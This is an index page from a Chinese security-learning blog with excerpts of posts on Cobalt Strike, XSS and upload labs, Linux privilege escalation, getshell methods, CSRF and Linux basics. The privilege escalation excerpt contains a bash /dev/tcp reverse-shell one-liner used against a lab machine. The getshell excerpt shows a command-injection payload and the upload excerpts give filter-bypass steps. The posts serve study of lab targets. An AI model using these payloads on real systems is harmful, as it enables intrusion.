Cobalt Strike体验

本篇文章仅用于学习记录,不得用于其他用途。一、CS简介1、CS简介Cobalt Strike是一款基于java的渗透测试神奇,常被称为CS神奇。自3.0以后已经不在使用Metasploit框 架而作为一个独立的平台使用,分为客户端与服务端 (CS架构的),服务端是一个,客户端可以有多个,非常适合团 队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做 模拟对抗,进行内网渗透。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木⻢生成,win dll木⻢生成, java木⻢生成,office宏病毒生成,木⻢捆绑;钓⻥攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。官方网站 https://www.cobaltstrike.com/2、为什么有CS非常适合团队协同作战 , 简称多人运动 , 插件也比较丰富 , 也是目前主流的c2工具二、目录结构agscript 拓展应用的脚本 c2lint

信息安全学习·网安·生命在于学习 · 2022-05-18 · 54 人浏览
Cobalt Strike体验

XXS-LABS

一、level-1这一关通过$_GET["name"],获取name的值,没有过滤通过echo直接进行了输出,所以很简单payload:name=123alert('xss'); 二、level-2这一关获取浏览器提交的keyword值,未进行过滤,输出在。如果是keyword提交的是alert(xss),返回的就会是

信息安全学习·网安·生命在于学习 · 2022-05-17 · 74 人浏览
XXS-LABS

Linux提权

本篇文章仅用于学习记录,不得用于其他违规用途。一、内核漏洞提权1、常规查找查看内核版本信息uname -a uname -r查看系统发行版本cat /etc/issue cat /etc/*-release Ubuntu 16.04 4.4.0-21-generic搜索该版本漏洞,把对应版本的文件上传到服务器编译执行searchsploit Ubuntu16.04 searchsploit -u #更新数据库2、Ubuntu 16.04提权DC-3 靶机做实验 , 开局一个shell http://192.168.0.189/templates/beez3/error.php /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 DC-3下载地址 https://www.vulnhub.com/entry/dc-32,312/ 后台 http://192.168.101.123/administrator/ admin snoopy发现是ubuntu16.04内核版本是4.4.0-21的,直接通过kali里面

信息安全学习·网安·生命在于学习 · 2022-04-12 · 82 人浏览
Linux提权

网站Getshell的方法

PS:本篇文章仅用于学习笔记记录,不可用于其他用途。一、通用getshell方法1、任意文件上传(1)注意编程语言 asp , aspx , php , jsp(2)上传成功 , 但是访问直接下载文件 , 以文本展示 , 原因 : 文件没有被解析(3)上传成功 , 蚁剑链接失败 , 原因 : 可能是对方有防护措施 , 拦截蚁剑的流量 , 可以在浏览器上访问页面是否存在 , 是否解析(4)一般在测试中 , 不推荐直接上传一句话 , 如 php , 上传 phpinfo , 测试是否解析即可==PS:一定不要混乱上传,保持头脑理智。==实战中遇到的偏多2、存在命令/代码执行的功能点关于代码执行/或者命令执行 , 这里也不过多介绍了 , 这里强调指的是在系统中自带存在的一些执行命令/代码的功能点 , 一般在网站后台存在 , 后面有案例演示 , 仍然是需要注意的点构造payload在原来的基础上实现任意命令的执行 , 比如 原本是 ping 127.0.0.1 , 构造127.0.0.1 && ipconfig , ipconfig 为任意命令 实战中遇到的偏少 , 很多业务系统后台不存在这

信息安全学习·网安·生命在于学习 · 2022-04-12 · 140 人浏览
网站Getshell的方法

Linux学习日记(五)目录结构

目录结构及主要内容“/”根目录部分有以下子目录一、/usr目录这个目录包含所有的命令、程序库、文档和其他文件。这些文件在正常操作中是不会被改变的,这个目录也包含你的Linux发行版本的主要的应用程序。二、/var目录这个目录包含在正常操作中被改变的文件:假脱机文件、记录文件、加锁文件、临时文件和页格式化文件等。这个目录中存放着那些不断在扩充着的东西,为了保持/usr的相对稳定,那些经常被修改的目录可以放在这个目录下,实际上许多系统管理员都是这样干的,顺带说一下系统的日志文件就在/var/log目录中。三、/home目录这个目录包含用户的文件:参数设置文件、个性化文件、文档、数据、EMAIL、缓存数据等。这个目录在系统省级时应该保留。四、/proc目录这个目录包含整个虚幻的文件,他们实际上并不存在磁盘上,也不占用任何空间,当查看这些文件时,实际上是在访问存在内存中的信息,这些信息用于访问系统。五、/bin目录这个目录为系统启动时需要的执行文件,这些文件可以被普通用户使用。六、/sbin目录系统执行文件,这些文件不打算被普通用户使用。(普通用户仍然可以使用他们,但要指定目录。)七、/etc

Linux学习·网安·生命在于学习 · 2022-04-01 · 136 人浏览

Linux学习日记(七)时间管理

一、Linux时间介绍Linux时钟分为系统时钟(System Clock)和硬件(Real Time Clock,简称RTC)时钟。系统时钟是指当前Linux Kernel中的时钟,而硬件时钟则是主板上由电池供电的时钟,这个硬件时钟可以在BIOS中进行设置,当Linux启动时,硬件时钟会去读取系统时钟的设置,然后系统设置就会独立与硬件运作。 Linu中的所有命令(包括函数)都是采用的系统时钟设置,在Linux中,用于时钟查看和设置的命令主要有date、hwclock和clock,其中,clock和hwclock用法接近,只用一个 就行,只不过clock命令除了支持x86硬件体系外,还支持Alpha硬件体系。 二、Linux时间设置命令1、date语法格式:date [-u] [-d datestr] [-s datestr] [--utc] [--universal] [--date=datestr] [--set=datestr] [--help][--version] [+FORMAT] [MMDDhhmm[[CC]YY][.ss]]==说明:可以用来设置系统日期与实践,只有管理

Linux学习·网安·生命在于学习 · 2022-03-31 · 147 人浏览

Linux学习日记(六)软件安装

一、RPMROM软件的安装、删除、更新只有root权限才能使用,对于查询功能任何用户都可以操作,如果普通用户拥有安装目录的权限,也可以进行安装,首先初始化rpm数据库,通过rpm命令查询一个rpm包是否安装了,也是要通过rpm数据库来完成的,所以我们要经常用下面的两个命令来初始化rpm数据库:[root@localhost]# rpm --initdb [root@localhost]# rpm --rebuilddb ==注意:这两个参数是极为有用的,有时候RPM系统出来问题,不能安装和查询,大多是这里出了问题。/var/lib/rpm目录下的数据库记录所有软件的升级需求,记录已经安装的所有软件,数字证书记录等,这个目录下的文件非常重要。==1、RPM软件包管理的查询功能命令格式:rpm {-q|--query} [select-options] [query-options]==RPM的查询功能极为强大,是极为重要的功能之一。==(1)查询系统已经安装的软件语法:rpm -q 软件名举例子:[root@Kelemao /]# rpm -q python package python

Linux学习·网安·生命在于学习 · 2022-03-30 · 109 人浏览

CSRF漏洞

一、描述CSRF定义:跨站请求伪造,也被成为one-click attack或者session riding,通常缩写为CSRF,是一种挟制用户在当前已登录的web应用程序上执行非本意的操作的攻击方法。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,却不能保证请求本身是用户自愿发出的。CSRF漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态,而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如添加账号等)。这个操作不是用户真正想要执行的。二、攻击原理1、简介用户打开浏览器,访问登录受信任的A网站,在用户信息通过验证后,服务器会返回一个cookie给浏览器,用户登录网站A成功,可以正常发送请求到网站A用户未退出网站A,在同一浏览器中,打开一个危险网站B网站B收到用户请求后,返回一些恶意代码,并发出请求要求访问网站A,浏览器收到这些恶

漏洞原理学习·网安·生命在于学习 · 2022-03-15 · 151 人浏览
CSRF漏洞

Upload-labs

一、折腾环境虚拟机win10环境phpstudy2018安装了upload-labs二、Pass-011、写好我们的测试文件2、将php后缀名改为jpg3、选择文件后开启抓包,点提交,burp抓到包4、将包中sh.jpg改为sh.php,发送包5、右键图片打开图片网址,则可以看到成功三、Pass-021、首先01关的方法02同样适用。2、直接选择php文件,开启抓包,提交抓到包3、将content-type值改为 image/jpeg,发送4、右键图片在新标签打开图片,即可看到成功四、Pass-031、需要在httpd.conf中查找application/x-httpd-php,开启php3或其他。2、选择sh.php文件,开启抓包,点提交,抓到包3、修改sh.php为sh.php3(其他也可以,具体请百度)4、发送包,关闭抓包,右键图片在新标签打开,即可看到成功。五、Pass-041、写一个名字为htaccess的文件,没有后缀名,上传,抓包2、抓到包后将在名字前面加个.3、发送,取消拦截,将sh.jpg上传,然后直接访问图片,即可发现成功六、Pass-051、选择sh.php,开

漏洞原理学习·网安·生命在于学习 · 2022-03-07 · 83 人浏览
Upload-labs

代码审计基础

图片来源于安全客。==注意:本篇文章仅用于自我学习与交流,不会过多或不涉及具体操作,不得用于其他用途。==一、代码审计简介顾名思义就是检查源代码中的安全缺陷,检查程序源代码是否存在安全隐患,或者有编码不规范的地方,通过自动化工具或者人工审查的方式,对程序源代码逐条进行检查和分析,发现这些源代码缺陷引发的安全漏洞,并提供代码修订措施和建议。——==来自百度百科==代码审计就是从安全角度对代码进行的安全测试评估,结合丰富的安全知识、编程经验、测试技术、利用静态分析和人工审核的方法寻找代码在架构和编码上的安全缺陷,在代码形成软件产品前将业务软件的安全风险降到最低。==实际上感觉就是真正的给你一个网站源码,从网站去找漏洞,而不是按照漏洞去找网站。==二、代码审计测试方法代码审计采用人工审计和静态分析工具辅助的方式进行。人工审计:既能解决内部问题也能解决外部问题,这也是目前最有效率的解决方案,并且在理论上手工代码审计是非常有效的,但人工审计的效率不高,所以我们会采用自动化分析工具辅助人工的方式来提高审计的效率。静态分析工具(也可以叫代码审计工具):通过一组全面规则,测试机制(里面是已经编写好的程

信息安全学习·网安·生命在于学习 · 2022-03-02 · 70 人浏览
代码审计基础
2019 - 2025 赛博保安日志. All Rights Reserved.
Theme Jasmine by Kent Liao 京ICP备2023023335号-2京公网安备11010802044340号